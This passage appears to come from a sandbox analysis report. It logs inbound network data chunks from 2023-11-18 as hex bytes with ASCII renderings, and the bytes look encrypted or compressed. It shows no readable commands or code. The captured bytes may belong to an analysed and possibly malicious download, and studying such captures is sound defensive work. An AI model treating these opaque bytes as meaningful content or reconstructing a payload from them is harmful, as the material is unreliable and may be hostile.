e4 84 7c e1 49 14 5e 71 5d 16 ea 9e b6 23 a1 28 50 4e 20 94 74 Data Ascii: sNv=\|],QJOuxVn"&,1,]Ok<LU)gt6LbL@lo+H-?a-e@:(eS&wUnvT+'/cL!)Tn5@=SoG}b>nc0TA)')X,A]0d\|I^q]#(PN t
2023-11-18 09:02:40 UTC	2688	IN	Data Raw: d6 07 05 3a 59 ff 1d 50 d5 84 bd f9 c1 0b bb 2e c1 fa 3b 0c a3 8b 88 a9 c4 4a fa f8 41 a9 c7 ef 31 34 79 d5 a2 49 6f 2c 75 11 7d 08 9e bf 68 f9 1c 42 cc a2 32 26 1a b3 7c 8e 15 33 46 a2 49 69 f9 bc 37 3c 4f 4c 10 b0 60 41 b7 99 09 1e 3b 64 7c 65 e0 82 ee 73 7d e6 83 08 27 97 57 91 21 d2 c7 53 27 67 88 cf 15 b7 38 62 7a 23 1c 31 8d e6 b0 bd 1a f6 3e 69 fe 47 fd 68 9b a8 fb be 30 df 18 27 01 c7 1b eb f0 78 63 03 1e 6f ac c5 e3 8d 7e 31 4e c2 55 0b 87 6b 57 90 27 7e 5b 2b 9c b0 75 d5 1e 20 9f 06 57 1d 3b f5 d8 a0 9f 7a 24 b2 58 8b 25 4b c0 93 b6 b4 81 87 51 cd f9 8b aa d2 73 f0 de 2b 43 d6 5c e3 f5 04 87 3c 3b 99 86 92 61 84 de b4 02 e0 be 9f f6 ba 16 3f 88 4e 9b c4 7e 2e bd ec 84 54 77 b6 40 5b 80 6d 87 d1 3e a2 ca 72 28 97 26 ca a6 53 81 7f 19 cf 64 f3 1a Data Ascii: :YP.;JA14yIo,u}hB2&\|3FIi7<OL`A;d\|es}'W!S'g8bz#1>iGh0'xco~1NUkW'~[+u W;z$X%KQs+C\<;a?N~.Tw@[m>r(&Sd
2023-11-18 09:02:40 UTC	2720	IN	Data Raw: 3b 2c 2b ab b1 a9 0e c7 8e b5 6c 75 57 ef b8 c7 f4 c5 33 81 2f 06 1a be b8 8d d5 2b 80 2f e4 64 4a f1 bc ac d1 74 4a e9 4e 47 63 e9 94 3e 64 fb 0a 04 22 96 bd ba e9 76 f9 94 fe fa aa a5 59 19 bf 36 b4 d0 de 57 1b ef 1e 69 3d c1 0e f9 66 ba dc 21 29 d4 21 17 a8 43 3e 10 f3 ff 54 98 ff a7 63 92 2d 70 aa 52 f7 ce 20 bd 81 0f a2 34 3e e1 d7 7b 93 a2 75 8e d5 83 d3 40 4f a8 f7 0e 8d 55 8b c4 63 0f 75 69 4c 83 86 8f bd d5 a7 c5 63 1f 35 55 3c f6 55 df bc 9b ea 0e 22 06 eb c5 b2 71 e7 8c 20 43 db 91 57 ec 33 3e b3 25 16 9c 66 3e e4 b9 dd b3 4a a3 79 62 29 de d8 fb 47 c2 9c 5b c6 49 45 6d 20 16 7b b8 9c e2 31 fd 83 a8 90 11 50 a2 77 71 31 78 dd 18 ba 78 fe 48 83 36 22 2e 48 55 4a 58 17 97 c4 2b e5 19 25 88 37 96 67 53 e5 5f 84 41 4b 28 67 0c 78 7b 88 f4 56 a5 06 Data Ascii: ;,+luW3/+/dJtJNGc>d"vY6Wi=f!)!C>Tc-pR 4>{u@OUcuiLc5U<U"q CW3>%f>Jyb)G[IEm {1Pwq1xxH6".HUJX+%7gS_AK(gx{V
2023-11-18 09:02:40 UTC	2752	IN	Data Raw: fb ca 28 8c 9a a3 b0 64 4d 70 0a 7d 44 e1 4c a2 b0 35 50 38 7d 0d 1d 94 4a 89 2b f1 b7 ca f5 45 18 1c d3 ed be 6a 4e 4b cb 3b a3 ac 2f 2c c1 74 b6 5b 0c d4 54 11 35 bf 13 35 6e a2 66 da 2b 8c 9a c0 6b a8 b3 e5 e3 f6 48 4b be 96 a9 32 f3 66 4d 33 d3 78 63 40 27 81 37 20 bc 61 8a 45 bd 4b d2 16 71 7c 80 c2 1d 9a 62 cf 60 b2 41 ec 13 8d 95 46 cd 15 b2 74 60 a4 c4 57 d8 3f 83 c6 d5 67 6e e8 3d ef f5 c7 d5 86 ca 0e 1f b1 a7 42 18 6b 8a 85 89 ab 1c 10 ab c7 dc 82 0d ab 83 f7 67 94 9b b7 e0 46 6a c1 de ab 58 0b 6e 5b 0d 67 e6 8a 83 80 d9 66 00 73 ca 00 66 13 81 39 bd 12 b2 38 ac c6 0d 68 32 e6 a3 c3 99 2d 5f b1 ad 88 66 ed ca 1b 50 16 01 17 bc c9 db 8d 61 bc 01 b0 d4 93 f8 8b 23 e8 09 82 f8 a3 1f ef ca 69 92 03 cf 93 28 bb 2a 59 12 92 5e 59 f1 a9 86 1a 09 e3 0f Data Ascii: (dMp}DL5P8}J+EjNK;/,t[T55nf+kHK2fM3xc@'7 aEKq\|b`AFt`W?gn=BkgFjXn[gfsf98h2-_fPa#i(*Y^Y
2023-11-18 09:02:40 UTC	2784	IN	Data Raw: 69 a5 67 0d b1 6e 76 97 23 7f 15 69 c6 87 df e9 81 cf 6c fa a6 3e 38 fd e3 88 1f ee 74 b2 29 7d aa 9c 4d 76 b4 36 80 26 49 dc e2 9a 41 f2 46 48 8d cd e4 ce af a7 d5 09 7c 69 7a ea cf f6 3f 12 65 72 fa 1c a8 88 7e 4e 88 e2 11 45 7a 9e a4 ff e4 bf fe ea 53 5c 3a a0 48 6b 92 74 c0 24 bd 40 d2 13 7f f9 6f bf c1 a5 83 8a f4 a9 55 43 3a 68 92 5e 24 69 18 b8 b8 b4 a6 48 1f 94 a4 35 93 74 81 a4 7d 92 74 48 91 fe bc 24 1d 32 49 2f 59 48 87 15 e9 b0 24 1d 36 49 17 2d a4 23 8a f4 5b 1f 1a d2 11 93 f4 32 97 d6 0c e9 a8 22 3d 22 49 47 0d 69 8d 56 6d 33 fd 45 3f ae 44 b3 70 33 9c 4d e9 37 be 79 f8 c6 c1 dc 66 9e 37 41 4f 07 e8 17 d6 2d 9b f3 fa 61 be 42 da fc 1a f1 04 88 27 00 3c 0b 32 4f 40 f0 04 89 27 08 3c 8b 32 4f 50 f0 68 c4 a3 01 4f 41 e6 d1 04 4f 88 78 42 c0 b3 Data Ascii: ignv#il>8t)}Mv6&IAFH\|iz?er~NEzS\:Hkt$@oUC:h^$iH5t}tH$2I/YH$6I-#[2"="IGiVm3E?Dp3M7yf7AO-aB'<2O@'<2OPhOAOxB
2023-11-18 09:02:40 UTC	2800	IN	Data Raw: d5 36 48 b4 0d 9a 62 43 5a 6c 08 89 0d 11 b1 21 aa 6d 88 68 1b 32 c5 86 b5 d8 30 12 1b 26 62 c3 54 db 30 d1 56 1c 48 68 e1 07 12 1a 52 f4 34 02 8f 97 9c f8 64 0b ff 4f 7e e8 83 7d ae 4a 45 3c 04 f1 f4 cf 71 7c af d4 f1 bd 6a 0d c4 b7 e8 5a 6e 24 92 b6 50 49 4f 7b 4b fa f0 eb a6 a4 b9 ae 4e e6 dd 1d e8 85 9c 74 32 4d 90 47 58 22 8c 2d 62 9d 0c 4b 94 3d 8b 58 46 89 e3 57 80 66 f5 0a d0 24 72 46 93 4a 2c bc 23 ea 68 c2 b9 45 d2 89 de c7 18 38 cb 5e 4a 8c 69 9b c4 cf 7c 42 8d 69 65 11 b8 cb 10 6f 66 1a f1 9b 7b 4c f4 5f c6 c0 59 f6 73 a8 91 5a 77 23 b5 ae 67 30 f3 8e f8 6d 36 e2 73 3d 89 0f 37 e2 73 37 e2 b3 3c 89 8f 3c 89 cf 6c c4 ef 7a 12 3f 6e c4 6f 36 22 3a 55 73 38 2d 7b 5f a5 82 7a 05 10 dd ab 39 50 97 fd b0 22 0e 60 e2 a0 5b 72 50 13 07 31 71 c8 2d 39 Data Ascii: 6HbCZl!mh20&bT0VHhR4dO~}JE<q\|jZn$PIO{KNt2MGX"-bK=XFWf$rFJ,#hE8^Ji\|Bieof{L_YsZw#g0m6s=7s7<<lz?no6":Us8-{_z9P"`[rP1q-9
2023-11-18 09:02:40 UTC	2832	IN	Data Raw: bd 93 e8 3d f6 b0 a0 ec cd 42 6f 88 de ea 40 6f d0 e2 96 e8 15 d1 6b 15 f4 0a 55 6b 89 5e 48 f4 12 7b 58 50 96 66 a1 67 44 cf 75 a0 67 68 71 4e f4 84 e8 a9 0a 7a 82 aa a9 44 8f 24 7a 8c 3d 2c 28 e3 1f 5f f7 07 98 f9 3e 1f 70 f6 43 1d b3 1f 60 52 43 ce be c7 d9 f7 55 66 df 43 55 5f ce be 23 67 df c5 1e 16 94 ae 59 df f0 2d a2 db 3a d0 2d b4 d8 26 ba 41 74 53 05 dd 40 55 53 a2 6b 12 5d c7 1e 16 94 ba 59 e8 0a d1 55 1d e8 0a 5a ac 12 5d 22 ba ac 82 2e a1 aa 2c d1 05 89 2e 62 0f 0b 4a d1 2c 74 8e e8 bc 0e 74 0e 2d e6 89 ce 10 9d 55 41 67 50 95 95 e8 94 44 a7 b1 87 05 25 6d 16 3a 41 74 52 07 3a 81 16 93 44 c7 88 8e ab a0 63 a8 8a 4b 74 44 a2 a3 d8 c3 82 12 fd 7a 9f 9b fa 3e 0f 71 f6 61 1d b3 0f 61 52 61 ce 3e c0 d9 07 55 66 1f 40 55 50 ce de 27 67 ef c7 1e 16 Data Ascii: =Bo@okUk^H{XPfgDughqNzD$z=,(_>pC`RCUfCU_#gY-:-&AtS@USk]YUZ]".,.bJ,tt-UAgPD%m:AtR:DcKtDz>qaaRa>Uf@UP'g
2023-11-18 09:02:40 UTC	2864	IN	Data Raw: 7f fe fe 67 ef db f7 7e fd f6 2c 2a 1e e9 bd c0 fb 08 ef e5 bb 9b 6e dd 38 09 cb d9 80 fe 04 fd 59 54 1c a8 3f 42 7f 80 fe e8 f0 69 6b a2 fb bd 01 af 06 ef 5e 54 ec e8 55 e1 dd c1 ab 3a dc bb 11 dd 6f 0d 78 37 f0 6e 45 c5 8a de 35 bc 2b 78 d7 0e f7 2e 44 f7 4b 03 de 05 bc 4b 51 31 a3 77 0e ef 0c de b9 c3 bd 13 d1 fd d4 80 77 02 ef 54 54 8c e8 1d c3 3b 82 77 ec aa b7 d7 40 58 86 06 f4 03 e8 87 a2 a2 47 7d 1f fa 1e f4 7d 87 4f bb 23 ba ef 1a f0 76 e0 ed 8a 8a 16 bd 6d 78 5b f0 b6 1d ee 6d 88 ee 9b 06 bc 0d 78 9b a2 a2 46 6f 1d de 1a bc 75 87 7b 2b a2 fb aa 01 6f 05 de aa a8 28 d1 5b 86 b7 04 6f d9 e1 de 82 e8 be 68 c0 5b 80 b7 28 2a 72 f4 e6 e1 cd c1 9b 77 d5 db 2b 23 2c 59 03 fa 0c f4 59 51 91 a2 3e 0d 7d 0a fa b4 c3 a7 9d 10 dd 27 0d 78 13 f0 26 45 45 8c Data Ascii: g~,n8YT?Bik^TU:ox7nE5+x.DKKQ1wwTT;w@XG}}O#vmx[mxFou{+o([oh[(rw+#,YYQ>}'x&EE
2023-11-18 09:02:40 UTC	2880	IN	Data Raw: f5 7c fd 76 c3 3f 5e cb 99 ac d7 26 67 b2 52 f5 74 ad cf 64 bd 96 1b fe c8 1e 0b 7c 76 e6 4c 56 41 1f 6c a0 f7 b4 78 b8 96 33 59 05 bd 33 41 6f a9 da 5d cb 0d bf d6 37 fc 86 3d 16 8c 8d 53 e8 a5 a0 57 36 d0 4b 5a 5c c9 a4 e7 82 5e 98 a0 e7 54 2d f4 a4 a7 7a d2 33 f6 58 30 66 4e a1 c7 82 9e d8 40 8f 69 71 22 93 1e 0a 7a 64 82 1e 52 35 d2 93 ee eb 49 0f d8 63 c1 18 38 85 ee 0a ba 67 03 dd a5 c5 9e 4c ba 2d e8 8e 09 ba 4d 55 47 4f ba a9 27 dd 62 8f 05 3e bf 3f cf 9d 7b 9e d7 65 f6 0d 1b b3 af 33 a9 86 dc f0 57 32 fb 9a c9 ec af a8 aa e9 1b fe 52 df f0 55 f6 58 30 aa 4e dd f0 65 41 57 6c a0 cb b4 58 91 1b be 28 e8 92 09 ba 48 55 49 df f0 79 7d c3 17 d8 63 81 cf ce 9c c9 2a e8 9c 0d f4 05 2d e6 64 d2 19 41 67 4d d0 19 aa b2 7a d2 e7 7a d2 69 f6 58 30 d2 4e a1 Data Ascii: \|v?^&gRtd\|vLVAlx3Y3Ao]7=SW6KZ\^T-z3X0fN@iq"zdR5Ic8gL-MUGO'b>?{e3W2RUX0NeAWlX(HUIy}c*-dAgMzziX0N
2023-11-18 09:02:40 UTC	2912	IN	Data Raw: c8 d7 94 5d 94 fb eb 0e ca fd f5 ff 04 09 fb eb 5b 31 8a fd f5 53 bb 28 32 38 a5 3b 3d cb e0 54 9f 4a ce 7c f8 05 c1 a7 cf 30 e8 7a 4e 66 06 dd b7 1f ab 66 70 46 ed 34 97 c1 09 da 69 2e 83 d3 f1 63 b2 1d c1 60 c7 61 b0 23 7e 12 63 c7 a3 29 ba 19 9c b4 1d 86 33 38 63 77 50 67 70 5e d1 79 ba 34 81 63 dd 61 f4 b3 16 65 ee c6 95 4d 93 bb c9 c8 d6 db 0f 05 4b f6 3f d9 c6 31 5d 44 b0 32 ff 81 df ae 9b 3a f8 57 96 11 2f f0 95 a1 02 3f 02 50 e2 20 8d d6 bd 59 e6 40 d6 b4 2c 2a 90 15 42 04 59 29 93 a5 43 f6 09 ac f7 5d 60 c8 3e 81 21 fb e3 87 cc 90 ed 32 19 b7 47 6d d4 5e ca 34 0a b2 a0 48 d4 14 bd 22 51 24 90 35 bd 1b 01 64 91 8b 44 a9 82 ac 50 25 c8 6a 94 49 5b 22 aa 7c 3b 35 c8 ca db 4e 79 0e 32 54 bd 44 94 0e c8 3a dc dd 78 89 a8 50 25 c8 aa bd 9d 1a 64 85 ca Data Ascii: ][1S(28;=TJ\|0zNffpF4i.c`a#~c)38cwPgp^y4caeMK?1]D2:W/?P Y@,*BY)C]`>!2Gm^4H"Q$5dDP%jI["\|;5Ny2TD:xP%d
2023-11-18 09:02:40 UTC	2944	IN	Data Raw: 76 8c 49 78 95 e6 3d 9f f8 cb d9 20 46 79 34 60 8c df 41 60 9b 9c 64 bb 7b a2 12 03 7c ce 50 39 20 fa d4 3d 78 aa a4 eb d0 02 9f b2 53 59 57 0a bf 67 d7 73 87 70 89 be 2b 59 9c ce 10 7b 66 83 c7 c5 0b 88 9e 4f d0 ab 67 42 91 80 7e 6b c7 77 43 3a 6b b2 53 36 81 2f 5d 3a f3 f8 67 ec 9a c7 d8 75 2d 63 57 b3 49 af 95 bf 22 3f a0 cd 80 79 f3 8b 7d 94 e3 b5 66 2b bd f2 45 81 95 b9 da c1 5c a2 84 4f b1 ad 3c 7d 51 13 b3 e4 5d 9f 21 4b 6b 58 4b d9 c8 66 1b 68 36 d2 42 a0 5d 3a f7 49 f4 93 e0 50 f3 65 b1 98 e5 30 41 07 50 0d fc e3 2c 3e d5 9a d0 60 14 e9 50 2b dc 26 d8 0a 5f e1 00 2f 11 fa 79 e9 13 fe 76 a1 44 7c bb 2f e4 b1 b7 9b 99 92 cb 62 d5 30 e4 e8 c9 4e 20 5c 32 8d 16 53 40 55 05 77 c2 ec 8d bf e5 0f 04 dd 13 d5 81 42 b3 53 e8 9b dc 61 fc 26 f1 fa e2 be 65 Data Ascii: vIx= Fy4`A`d{\|P9 =xSYWgsp+Y{fOgB~kwC:kS6/]:gu-cWI"?y}f+E\O<}Q]!KkXKfh6B]:IPe0AP,>`P+&_/yvD\|/b0N \2S@UwBSa&e
2023-11-18 09:02:40 UTC	2960	IN	Data Raw: 4f 25 29 8a b1 a1 87 bc 6a ea 88 9c d0 8c 0a 98 2f e9 5e d7 f9 bc fa 7c 2d 17 c0 a0 cb dc 07 1d fa 48 ba 15 f7 40 aa fb c7 fe c2 76 91 c9 ed 12 93 db ad 4c 1e e5 3e e9 34 7d 52 ee 2d ea 8e ff 08 4c 56 78 bb b2 c0 8d c9 d3 dd 41 f7 fe 88 32 a6 c8 4c 6e ef 88 c9 13 fb ba 32 79 99 fb 7c 4b 96 73 26 7f eb 3e e8 d9 e5 12 93 7f 39 d7 b9 48 36 5e 34 20 f5 4b 2c 7d 85 ff 60 5c 2e fd 9b f0 db fc 9e 6d 99 c8 da 2c df b2 f0 7d 07 5b 0f 29 af 50 c6 77 ad 5a c9 e4 26 4f c9 64 d5 43 36 63 df 0a 4d 93 4e 22 97 55 0a 65 6a b8 a7 cb f8 90 9c 31 47 7a 51 0d 8d 4a 4c dc 02 81 98 b8 05 56 62 e2 16 d8 89 89 5b e0 46 8c 94 d1 65 7c a3 8d 18 ff 6a 1b 31 77 7c d9 29 62 1e 4c 11 7c 4b 05 0e c7 03 dc 3d 53 fa 39 77 2f 08 7a d6 fc 3a 35 5a 14 ad 89 5d 0c b3 ef 7f bf b1 be ea 4e 32 Data Ascii: O%)j/^\|-H@vL>4}R-LVxA2Ln2y\|Ks&>9H6^4 K,}`\.m,}[)PwZ&OdC6cMN"Uej1GzQJLVb[Fe\|j1w\|)bL\|K=S9w/z:5Z]N2
2023-11-18 09:02:40 UTC	2976	IN	Data Raw: da a4 8a 40 99 a9 57 b5 95 b9 b4 5a 54 06 e7 47 c8 2f 5e 1b 36 3d 9a ce 30 51 65 8a e0 cb 09 c4 cf 4f c1 15 88 9b d8 d5 9c 20 b5 ab 54 c9 24 cc 31 49 c8 b1 17 2a 99 a4 a9 e4 c1 72 54 f2 bd af 88 92 d3 22 50 72 c1 8f da 4a 76 91 28 99 8c 90 92 05 48 59 6f 81 92 c9 a2 92 9b 3a 89 f8 13 f1 e6 44 e1 e6 67 4d 80 3f 51 bc b9 67 94 6e 2d ad 5a 43 34 1c 20 eb 3f 76 d0 69 87 08 94 fc b8 45 5b c9 a4 4f 44 25 6d 88 db 26 e0 fe 6b 0e 28 69 13 71 1f d2 7e bb c4 6b e1 be 8f e0 be 5a 42 70 57 45 80 bb e9 8a 36 ee 29 ab 44 dc b1 88 3b 56 c0 bd 33 1b 70 c7 8a b8 bb eb e0 f6 b8 cd d0 9e c3 16 bd dd fa 91 b2 7d 58 d9 53 de 3e 34 2c 93 37 7f ce d3 e6 8f b5 3b d7 3e 9c db 93 6f 1f 16 38 bd a4 c2 33 fa 18 9b 27 73 31 e3 34 7b 32 8b 19 a7 c5 93 b9 9c 71 c6 7a 32 57 30 4e 2e 7d Data Ascii: @WZTG/^6=0QeO T$1I*rT"PrJv(HYo:DgM?Qgn-ZC4 ?viE[OD%m&k(iq~kZBpWE6)D;V3p}XS>4,7;>o83's14{2qz2W0N.}
2023-11-18 09:02:40 UTC	2992	IN	Data Raw: 5f 40 e3 78 0d 91 f0 5a 1e 8c d7 48 c0 6b 20 bb ea 5e 58 2f cd 79 a3 6b 0a 26 8f d4 ff ef 3d 38 58 8e 60 97 4f f4 e0 72 a0 dc 87 0d 43 e1 46 0f 04 28 54 63 d5 6a 7d 24 a9 38 6b bc fa f0 3c 56 fc bf 3a 77 6c 02 17 40 42 e0 7c 5f 20 c0 61 c5 99 5d c2 1a a1 5c 2e ac c7 ab 8d 83 be c9 d0 77 bd 65 d0 76 a7 27 a7 13 8d 81 0f 9f 6d 0c fc 95 e0 81 8f 99 02 c5 d4 d4 a1 01 74 7b 0e 42 f3 eb 54 d8 1e d0 99 e9 d3 7b b0 38 03 16 15 75 31 2e b8 1f bf bc b9 86 17 f2 9a c0 0b 9f 8e 35 57 f4 f2 25 5f e6 19 6e 29 97 79 49 94 09 f0 97 45 90 7d a9 58 85 2a 15 eb 38 8d 29 52 05 ff aa 16 fe 1d 37 cb 9e 7f 13 d8 88 a2 2b 68 44 ef 12 ff 9e 7b 02 83 b8 99 13 87 16 93 ab da 03 1a 63 ed d0 98 87 68 cc 23 34 9a 05 1a cd 16 34 be 48 09 af ca 38 1a 3b f9 15 1b 88 c6 3c 13 1a 99 50 46 Data Ascii: _@xZHk ^X/yk&=8X`OrCF(Tcj}$8k<V:wl@B\|_ a]\.wev'mt{BT{8u1.5W%_n)yIE}X*8)R7+hD{ch#44H8;<PF
2023-11-18 09:02:40 UTC	3008	IN	Data Raw: dd 6f 9e 39 7e 01 32 ee b1 e3 bc f0 a1 5c d4 2d c8 dc 60 74 0c f4 6c 0c aa ca 4d 1f 5a c9 e8 a6 0f e5 32 e2 30 09 08 33 07 60 da 3f b0 d2 58 fb 07 72 8d b5 c4 18 ef c9 fc 1e 60 36 7c 10 a4 a2 36 c3 6c 10 60 6e 8c 32 c2 f0 0b 32 27 de 23 30 53 3f a0 6b 2a f8 7b 6c 27 ea 8a 6a ee ab 4e 1e c2 0f 62 15 84 ae d4 df 7a 91 60 53 3c a8 fc a7 b5 72 b4 5c ae 95 2e 64 20 15 19 48 05 06 d6 94 5b 69 65 4d b9 5c 2b 1c e6 3a 84 f9 be 8c c0 4c 2a b7 d2 ca a4 72 b9 56 ba 62 8c 37 6b 56 03 cc c5 e5 56 5a b9 b8 5c ae 15 0e 73 3d c2 dc 0b 30 7b de d7 b4 f2 fe cf 7a ad a4 9d 96 6b e5 26 51 2b 19 c7 e2 8d e7 ac b8 23 a1 5a a9 a1 5a a9 a6 73 4c a5 5e 37 7a d7 79 70 7b 33 b3 71 c7 fb 72 dd 24 0e 64 6c dc 81 6c 14 6f 20 6c 84 bf 0f d2 70 4b 60 c2 df 97 eb 86 c3 dc 89 30 b7 03 4c Data Ascii: o9~2\-`tlMZ203`?Xr`6\|6l`n22'#0S?k{l'jNbz`S<r\.d H[ieM\+:LrVb7kVVZ\s=0{zk&Q+#ZZsL^7zyp{3qr$dllo lpK`0L
2023-11-18 09:02:40 UTC	3024	IN	Data Raw: bb cd f0 06 85 f5 6d 23 dd 92 19 3e 99 cb 3a 98 a7 64 88 05 68 7f 57 3e 8a a1 55 ec f6 67 51 95 68 2b 77 13 3e 55 43 60 a0 83 32 64 2a f7 3c 6a 2f f3 b1 ab a9 a5 4b e9 d7 9c 46 fb 73 b5 fc 94 d0 b3 08 9b a6 65 9d 33 b0 5c 3e 96 cb cf 69 7c 26 cb 98 76 5e 8d e9 85 98 5e 98 d3 f8 34 43 29 89 c5 f4 40 b1 a3 7b 23 5f 40 bf 7e cd dd 51 2d 9d c0 42 61 cc 69 dc 3c 99 7e 3b 10 ed 5b 3a fd b6 17 0c 21 e9 fe a8 85 05 d0 64 91 50 bd 94 67 1e ba 39 49 02 8b 78 ed 63 9b f0 71 1e 7e 8c 80 47 00 ee cd 70 05 38 06 78 92 69 27 96 d1 fe fe 1e 31 f6 9f 6d 1b 0b 6a 87 36 4b 4e 1f 7b c1 f2 cf 6f 84 55 d8 79 44 58 ba 92 a4 73 9a 5c 31 55 1d b7 4d 37 3c 25 d9 e2 2d 48 a7 ba 6a e4 22 3f 2c f5 0d 18 72 cd 87 0b 7e bd ce 50 46 bd 35 cc 67 ab 90 ba ed 54 f4 55 ba 8c 09 a9 95 ec 81 Data Ascii: m#>:dhW>UgQh+w>UC`2d*<j/KFse3\>i\|&v^^4C)@{#_@~Q-Bai<~;[:!dPg9Ixcq~Gp8xi'1mj6KN{oUyDXs\1UM7<%-Hj"?,r~PF5gTU
2023-11-18 09:02:40 UTC	3040	IN	Data Raw: a4 3d 22 d4 85 8e e1 14 42 37 f3 0b 87 fd 28 0f 59 47 96 dc d9 a1 42 04 93 91 14 1b 13 e6 de c9 9e ee 0f 9c de a0 41 e1 81 22 06 b5 27 7d 69 99 11 7d e9 89 e1 2a 4c 84 cf 24 f8 a4 a0 4d 2b e9 0f 14 8c a9 ec dc 81 23 26 bf 2f 1b 31 75 c1 27 16 d4 a3 d4 c6 31 07 22 d2 24 41 a6 76 37 49 ec cb eb 51 c9 08 9e 73 c1 b6 80 f5 45 3f e2 a6 8d 4f 8e a9 a1 b4 75 fd 72 01 db e4 02 4c c3 65 86 5e 44 37 1b 0b 7e 08 10 46 0f 54 b2 63 0e c1 06 c2 b5 ea 94 85 ef 18 b4 c0 87 9d 2a bb 5e 80 52 df 38 0b fb 9a 4d 4f 69 41 7c 58 38 c4 9f 54 61 89 e7 58 e3 ca 39 45 1b 9b c3 2f 3a 87 f0 0b 0d 89 65 e7 31 f1 4e 23 91 51 60 6c cc 0e 97 8e f1 7c 46 e1 d7 a6 bf c0 ed 20 1f 38 17 e9 7e ca 51 14 e8 57 a4 45 86 d3 39 0c 7e ad eb 4d 0a 7e ad 4b 78 8f be ce 87 c2 df e6 d0 96 9e 83 16 53 Data Ascii: ="B7(YGBA"'}i}L$M+#&/1u'1"$Av7IQsE?OurLe^D7~FTc^R8MOiA\|X8TaX9E/:e1N#Q`l\|F 8~QWE9~M~KxS
2023-11-18 09:02:40 UTC	3056	IN	Data Raw: 77 4a 2f e7 f0 9d c0 87 ef e9 e1 63 7c c0 cd 30 b8 3b 6c 66 57 d5 c1 a7 d3 e4 e0 c5 ed f6 8f e0 06 d9 89 d5 c3 ff d1 c7 ce 9a 9c de b2 68 0e a5 43 5e f7 81 96 88 0e 54 2e 80 bc d5 76 ff 7a 78 ed ad b9 0a 05 84 c6 38 cc f7 ad 4f a7 71 88 6c b1 06 ea ef fd c0 be 26 a7 7f 28 53 d2 81 0a 14 e7 f4 60 f8 1a 63 d1 9b 31 90 25 47 54 4f f4 17 7d cf 44 6d e5 ad 74 c5 2a e8 ec 23 26 94 9b b6 c0 d6 39 19 7b 43 06 7a 0f f6 e8 a5 ed 5c 6a f6 8b 4f aa e8 06 ad 4f fa eb c7 59 49 7c 8a 95 ae 2d 9f 71 98 66 25 96 ac 4f d7 36 1c 1c cc 20 b9 64 7d 0f 45 e5 f0 10 99 e5 8d f1 e3 80 96 cb 89 69 53 69 02 74 c7 99 00 4f 2f 17 bb 8a 79 18 08 a7 07 9d 22 f9 aa 3d 26 1c 5f 3b 70 76 00 ce 00 c0 41 66 fd 45 c9 31 2c 71 6c ca 2d 99 01 af b4 6a be e7 69 33 b7 a3 1d a4 c6 02 a9 b7 30 bc Data Ascii: wJ/c\|0;lfWhC^T.vzx8Oql&(S`c1%GTO}Dmt*#&9{Cz\jOOYI\|-qf%O6 d}EiSitO/y"=&_;pvAfE1,ql-ji30
2023-11-18 09:02:40 UTC	3072	IN	Data Raw: 49 24 b1 b2 6f 3d 13 2b 17 68 62 e5 02 8b 58 99 71 32 ba 58 29 06 bd 86 0f fa e4 71 13 11 1f b6 83 5f b3 98 40 41 2e 9e d4 dc dd cd 96 32 1d 3f 87 3b cc f8 f9 c6 82 9f 75 bc ab ab db 19 7e 56 b1 ca 81 95 84 11 9c c4 86 bc aa 18 b2 5b d1 16 6a 0b 20 be 0a 70 23 15 1b 94 9d 9a 90 97 77 4b 97 ee 44 1b fa 1a cc 41 4d a2 12 40 2c 28 89 3d 8d e0 a1 b4 38 23 86 60 d8 f6 52 7f b4 b3 e1 5c 70 16 b0 11 41 34 74 89 eb 3b f0 24 ec 57 8a 66 77 fa 14 6b 29 5d fa 25 e5 6a 0d 9a 1c b6 4f f6 bc a5 aa e1 fc d7 87 fb a4 81 9b fd de f6 cb 38 65 65 67 18 27 be ce 66 e4 7c a3 cf 9a b8 65 d2 2f 84 3f 2d 1c fe 67 52 94 9d e4 af 52 64 f8 82 ef 75 5e 04 3d 4f 38 c0 e8 39 5b a3 e7 6c 0b 3d fb 8e 5f 1c 3d 1f e4 44 76 a5 62 a4 e7 90 cb 9a b5 49 ee b3 2c ba 44 b0 5f d6 f9 f6 e0 dc 0b Data Ascii: I$o=+hbXq2X)q_@A.2?;u~V[j p#wKDAM@,(=8#`R\pA4t;$Wfwk)]%jO8eeg'f\|e/?-gRRdu^=O89[l=_=DvbI,D_
2023-11-18 09:02:40 UTC	3088	IN	Data Raw: 17 e2 ff ee 42 15 2a 85 ea 85 f5 71 75 98 8e ab f0 3e 4f bd 42 fe 35 bf 8d e2 73 8a 46 50 ba 1e c2 df 44 67 87 19 87 d2 df 25 1c 0a c6 e1 50 6e 56 58 8b dd ca 70 0b b6 42 33 d0 17 f0 f2 1e 75 86 22 20 4c 4c ae 6b 6e d3 4c 28 0c 69 07 0a 3b 7a c7 43 61 ab 10 f2 ac 4d ad 1a 19 f3 a7 22 c6 fc b7 a3 c4 98 1f 95 28 8f 79 fc 34 e7 1f 9a d4 b1 ee bb 0d 65 44 86 72 12 dd 83 51 22 a4 8c ed 53 c7 a2 e8 67 98 ef 4f 19 dd a2 85 b2 63 a2 4d e5 99 0b b3 3e e5 6e 81 7d 49 67 03 2d 10 81 3c af 19 d9 22 1f b5 00 f9 54 78 ea 3c 59 d6 df 2c bc 52 12 49 a6 fc c3 97 4d 6a 6b 46 61 7b 3d 6b c4 cc 66 da 25 c2 2d 50 30 d2 28 c8 af 13 d6 3a b2 6b 09 6b e7 50 41 de 79 87 2e c8 7f 18 89 3c 8d 19 e0 7b ad 09 d8 7a 13 b0 b9 14 d8 33 00 ac 29 37 ac c9 8a 11 e2 b4 22 55 6d 97 5c 3a 84 Data Ascii: B*qu>OB5sFPDg%PnVXpB3u" LLknL(i;zCaM"(y4eDrQ"SgOcM>n}Ig-<"Tx<Y,RIMjkFa{=kf%-P0(:kkPAy.<{z3)7"Um\:
